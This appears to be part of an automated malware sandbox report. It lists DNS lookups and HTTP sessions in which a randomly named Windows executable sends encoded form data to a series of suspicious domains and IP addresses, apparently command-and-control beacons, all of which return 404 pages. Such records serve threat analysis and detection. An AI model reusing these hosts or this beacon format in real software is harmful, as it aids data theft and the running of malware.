Jan 10, 2025 16:43:06.045205116 CET	1.1.1.1	192.168.2.5	0xfc63	No error (0)	www.vh5g.sbs		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:19.392745018 CET	1.1.1.1	192.168.2.5	0xd75	Name error (3)	www.envisionmedia.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:27.722896099 CET	1.1.1.1	192.168.2.5	0x74b6	No error (0)	www.marketyemen.holdings		199.59.243.228	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:41.100325108 CET	1.1.1.1	192.168.2.5	0xcca9	No error (0)	www.deacapalla.online		208.91.197.27	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:43:55.021745920 CET	1.1.1.1	192.168.2.5	0x26e3	No error (0)	www.100millionjobs.africa	100millionjobs.africa		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:43:55.021745920 CET	1.1.1.1	192.168.2.5	0x26e3	No error (0)	100millionjobs.africa		136.243.64.147	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:08.444703102 CET	1.1.1.1	192.168.2.5	0xaa5d	Name error (3)	www.elettrocoltura.info	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:16.524630070 CET	1.1.1.1	192.168.2.5	0x8c82	No error (0)	www.axis138ae.shop		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:29.692915916 CET	1.1.1.1	192.168.2.5	0xe53f	Name error (3)	www.reynamart.store	none	none	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:38.600763083 CET	1.1.1.1	192.168.2.5	0x8681	No error (0)	www.x3kwqc5tye4vl90y.top	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:44:38.600763083 CET	1.1.1.1	192.168.2.5	0x8681	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:38.600763083 CET	1.1.1.1	192.168.2.5	0x8681	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:44:52.220618963 CET	1.1.1.1	192.168.2.5	0x628	No error (0)	www.al-madinatraders.shop	al-madinatraders.shop		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:44:52.220618963 CET	1.1.1.1	192.168.2.5	0x628	No error (0)	al-madinatraders.shop		93.127.192.201	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.f5jh81t3k1w8.sbs

www.lmueller.dev

www.valuault.store

www.odvfr.info

www.fersigorta.xyz

www.vh5g.sbs

www.marketyemen.holdings

www.deacapalla.online

www.100millionjobs.africa

www.axis138ae.shop

www.x3kwqc5tye4vl90y.top

www.al-madinatraders.shop

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49904	154.213.39.66	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:47.097542048 CET	579	OUT	GET /blfv/?Bb6h7=gBiPvnrHa&V8=OYzX9ZD8JFvHop8tcVV8HuyU67NFgrHF6vfAGJLgGhZlSUdZ/OYKAWfRY9pPenrbZbnckt/3jffsXR68PKDW9Ecs4jeXW699fOhXXOdveN0uJ+M8ggMhXVa/XAWEfUcQVw== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.f5jh81t3k1w8.sbs Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:41:48.012099981 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 10 Jan 2025 15:41:47 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49977	46.38.243.234	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:03.144748926 CET	827	OUT	POST /z8lg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.lmueller.dev Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/z8lg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 47 4a 6a 35 56 47 30 6a 6c 61 34 55 68 2b 56 66 61 65 62 50 75 73 32 58 7a 4e 77 41 58 51 2f 33 44 43 5a 30 61 53 53 54 4d 4f 72 50 4b 64 50 4a 33 37 57 4d 50 46 45 6a 70 45 55 54 4a 57 46 74 38 36 35 70 52 69 65 4b 33 54 76 69 66 54 45 6d 48 6e 33 4b 6a 6e 33 58 32 38 4a 6b 49 48 7a 76 62 31 73 67 7a 67 5a 54 55 59 6c 49 62 64 50 30 39 6e 48 6b 6e 78 32 6b 56 65 33 51 47 31 56 38 30 63 65 35 46 62 5a 32 4d 4a 65 66 58 76 37 67 57 4b 6e 30 2b 77 31 48 64 43 2b 68 56 6a 45 68 38 64 4f 72 51 38 47 30 56 61 56 6b 67 49 4c 6c 4e 6c 42 75 73 50 6b 4e 46 30 73 3d Data Ascii: V8=Q8GV0qNEbfcOGJj5VG0jla4Uh+VfaebPus2XzNwAXQ/3DCZ0aSSTMOrPKdPJ37WMPFEjpEUTJWFt865pRieK3TvifTEmHn3Kjn3X28JkIHzvb1sgzgZTUYlIbdP09nHknx2kVe3QG1V80ce5FbZ2MJefXv7gWKn0+w1HdC+hVjEh8dOrQ8G0VaVkgILlNlBusPkNF0s=
Jan 10, 2025 16:42:03.773226023 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:39:22 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49978	46.38.243.234	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:05.682810068 CET	847	OUT	POST /z8lg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.lmueller.dev Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 223 Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/z8lg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 46 6f 7a 35 5a 46 73 6a 69 36 34 4c 76 65 56 66 52 2b 62 31 75 73 36 58 7a 4a 4a 48 55 6a 58 33 43 6a 70 30 41 54 53 54 41 75 72 50 42 39 50 41 71 72 57 78 50 46 4a 65 70 46 6f 54 4a 57 35 74 38 2b 39 70 51 54 65 4a 33 44 76 67 48 6a 45 34 4b 48 33 4b 6a 6e 33 58 32 2f 30 44 49 48 72 76 63 45 63 67 79 42 5a 51 58 59 6c 48 63 64 50 30 35 6e 48 34 6e 78 32 47 56 66 72 2b 47 33 64 38 30 64 75 35 45 4b 5a 31 43 4a 65 64 5a 50 37 2f 61 49 57 74 35 47 31 79 62 44 61 6e 4a 42 51 65 30 4c 2f 42 4b 65 4f 63 47 36 35 63 77 62 44 53 63 56 67 48 32 73 30 39 62 6a 34 75 4d 57 4e 57 48 4b 4f 41 6c 64 79 4e 4b 6e 4e 64 65 6b 74 6a Data Ascii: V8=Q8GV0qNEbfcOFoz5ZFsji64LveVfR+b1us6XzJJHUjX3Cjp0ATSTAurPB9PAqrWxPFJepFoTJW5t8+9pQTeJ3DvgHjE4KH3Kjn3X2/0DIHrvcEcgyBZQXYlHcdP05nH4nx2GVfr+G3d80du5EKZ1CJedZP7/aIWt5G1ybDanJBQe0L/BKeOcG65cwbDScVgH2s09bj4uMWNWHKOAldyNKnNdektj
Jan 10, 2025 16:42:06.316595078 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:39:25 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49979	46.38.243.234	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:08.238205910 CET	1864	OUT	POST /z8lg/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.lmueller.dev Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Origin: http://www.lmueller.dev Referer: http://www.lmueller.dev/z8lg/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 51 38 47 56 30 71 4e 45 62 66 63 4f 46 6f 7a 35 5a 46 73 6a 69 36 34 4c 76 65 56 66 52 2b 62 31 75 73 36 58 7a 4a 4a 48 55 6c 50 33 44 52 68 30 61 30 75 54 4f 4f 72 50 4d 64 50 46 71 72 57 67 50 46 67 5a 70 46 6c 6f 4a 51 39 74 38 64 6c 70 59 42 32 4a 6b 6a 76 67 62 54 45 6c 48 6e 33 6c 6a 6e 6e 54 32 38 63 44 49 48 72 76 63 48 45 67 30 51 5a 51 52 59 6c 49 62 64 50 47 39 6e 48 63 6e 31 61 38 56 66 76 41 47 45 6c 38 7a 39 2b 35 48 34 78 31 4b 4a 65 54 61 50 36 71 61 49 61 49 35 47 42 49 62 44 2f 77 4a 44 41 65 30 50 53 41 55 4f 2b 49 64 62 56 6f 37 6f 62 65 45 6c 56 6b 2b 4b 30 56 58 43 74 42 51 32 42 70 42 4b 32 58 74 4f 66 4b 59 42 6c 5a 58 44 77 31 52 38 47 53 75 64 57 4b 49 61 36 77 79 48 42 4b 57 66 65 4c 6c 47 66 4b 58 73 6c 39 51 75 43 2f 6d 4c 67 73 35 4e 79 54 6e 61 68 54 47 71 51 6d 51 63 5a 61 50 30 58 74 70 75 53 47 36 46 79 43 70 32 6f 6a 43 38 69 76 4f 4b 44 31 4e 76 53 72 6e 66 66 31 49 49 79 56 68 7a 48 68 52 36 33 73 62 53 53 6b 4f 4b 68 37 72 6b 30 30 58 39 57 42 68 31 65 [TRUNCATED] Data Ascii: V8=Q8GV0qNEbfcOFoz5ZFsji64LveVfR+b1us6XzJJHUlP3DRh0a0uTOOrPMdPFqrWgPFgZpFloJQ9t8dlpYB2JkjvgbTElHn3ljnnT28cDIHrvcHEg0QZQRYlIbdPG9nHcn1a8VfvAGEl8z9+5H4x1KJeTaP6qaIaI5GBIbD/wJDAe0PSAUO+IdbVo7obeElVk+K0VXCtBQ2BpBK2XtOfKYBlZXDw1R8GSudWKIa6wyHBKWfeLlGfKXsl9QuC/mLgs5NyTnahTGqQmQcZaP0XtpuSG6FyCp2ojC8ivOKD1NvSrnff1IIyVhzHhR63sbSSkOKh7rk00X9WBh1ex5bs4bJdtl30tJC2VqGN0rh9qm84S58Eujz7ylwlgjs2cgKvnRbABBEykzV70owjqzGJXcMf+4iSUZ50wpmikJf0UdrnI4pVSPraJ/CuqwNiPLlQhOFhk1JEFEUnMrTeoyTAn8DF7LEpqZ17iT7DPfFi4wAfjoNOu79cIAFkXoPh8tQh43G6PSfcYD7WETtNmppqbQzTX+p7PROKrMGjoqhnk2b11vRTYJ3Llzt0chr/jZ4NyYnMPYzgofrFUYhdIc35m7jULCZJLIShv4fLgQyrISxfLjTHBz7vCyoqhAxBTZlrzIEvC5j8ymPKoyIbl5kH1zG70MHNGdOWOiUxYanPdEG1lt//bIUrQ5d2Xg7iOVnDHPtwSTLNcgLK+qT8lPUUZVNZn/z7s3JkkjCKFcmd/4AQ3qfdZjI3vodxC3/s8Xl6VxAZtEaP0ar8XdYzfEPVh2CmVZycwmO7G9p9QG6KAuYTMeo4vrTlJb4mUxEZLzB/7yb5D+eiQn6t5QJ0+GZPBbHZ8VRf9FDi8y0S1/zivprxgdfNBH2xpvw+3ccWooPorU/3iC2y7xZhjoTEOktkLTsvZmeAsm9fLzp0/mFFGZz9Ug+LlxjmR4tf0FmkeKBT3/LMN1Z+NaZuS+c61F2t+PlTN5qAS3D5bOvj50bsjEeJr5lVbF [TRUNCATED]
Jan 10, 2025 16:42:08.872823954 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:39:27 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49980	46.38.243.234	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:10.788733959 CET	575	OUT	GET /z8lg/?V8=d+u13dJhHOFzWIGSYGA26K0asZwGQ+354a/EjoVDUhr6ByY3LBq4B/TBSd/j0JaEFkEgokttXRJz3Nwxbwya2xH8ETEZDRfZixXgz51iFTfhRHR1qQVQUph6fdb1/VOV9g==&Bb6h7=gBiPvnrHa HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.lmueller.dev Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
Jan 10, 2025 16:42:11.421376944 CET	458	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:39:30 GMT Server: Apache/2.4.10 (Debian) Content-Length: 278 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6d 75 65 6c 6c 65 72 2e 64 65 76 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at www.lmueller.dev Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49981	209.74.79.42	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:24.583030939 CET	833	OUT	POST /nhb9/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.valuault.store Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 203 Origin: http://www.valuault.store Referer: http://www.valuault.store/nhb9/ User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516 Data Raw: 56 38 3d 65 4e 38 59 65 5a 61 2b 69 2b 6e 74 6f 7a 43 6b 54 4b 76 71 4a 4e 69 68 63 42 6f 7a 75 59 6e 63 41 56 78 73 63 72 6b 35 4b 4a 65 43 64 6e 6e 59 56 4d 43 66 52 71 51 6a 77 4e 55 4c 30 6b 53 7a 39 47 44 50 34 50 38 68 32 4d 65 6b 50 7a 57 63 45 4f 4a 2f 42 73 6e 67 4a 4f 6f 65 72 4d 51 56 2b 47 7a 73 43 77 32 6a 64 72 75 75 6b 51 74 68 69 6e 31 78 66 45 32 6d 4c 52 6c 58 59 54 36 32 61 6d 77 50 77 72 54 6e 53 57 50 48 53 6f 52 53 39 6b 68 2f 6e 61 73 56 34 63 57 4e 6f 48 4a 4c 6f 67 61 32 53 63 69 2f 6f 59 33 62 46 6a 48 4d 49 59 34 39 49 4b 43 65 67 61 56 35 42 59 47 5a 62 4b 71 79 63 4c 55 3d Data Ascii: V8=eN8YeZa+i+ntozCkTKvqJNihcBozuYncAVxscrk5KJeCdnnYVMCfRqQjwNUL0kSz9GDP4P8h2MekPzWcEOJ/BsngJOoerMQV+GzsCw2jdruukQthin1xfE2mLRlXYT62amwPwrTnSWPHSoRS9kh/nasV4cWNoHJLoga2Sci/oY3bFjHMIY49IKCegaV5BYGZbKqycLU=
Jan 10, 2025 16:42:25.130162001 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:25 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49982	209.74.79.42	80	2412	C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe

Timestamp	Bytes transferred	Direction	Data
